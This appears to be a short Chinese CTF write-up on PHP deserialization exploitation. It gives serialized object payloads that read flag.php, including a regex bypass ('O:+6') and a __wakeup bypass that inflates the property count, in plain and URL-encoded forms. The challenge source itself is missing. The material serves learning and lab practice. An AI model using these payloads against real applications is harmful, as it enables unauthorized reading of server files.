2026-3-15-反序列化漏洞利用
三月 15, 2026
反序列化漏洞利用
主要函数
- serialize 序列化函数
- unserialize 反序列化
原理:
1.用户输入可以传入到unserialize
2.存在可利用的函数
3.有危险的魔术方法
4.构造POP链达到漏洞利用
例:
题目
1 |
|
1.先过正则
2.跳过__walkeup
3.执行__destruct()
O%3A6%3A”secret”%3A1%3A{s%3A4%3A”file”%3Bs%3A8%3A”flag.php”%3B}
O:6:”secret”:1:{s:4:”file”;s:8:”flag.php”;}
被正则过滤Are you daydreaming?
O:+6:”secret”:1:{s:4:”file”;s:8:”flag.php”;}
O%3A%2B6%3A”secret”%3A1%3A{s%3A4%3A”file”%3Bs%3A8%3A”flag.php”%3B}
flag: fakeflag!
没有绕过
__wakeup()
- O:+6:”secret”:2:{s:4:”file”;s:8:”flag.php”;}
URL编码后成功拿到flag
查看评论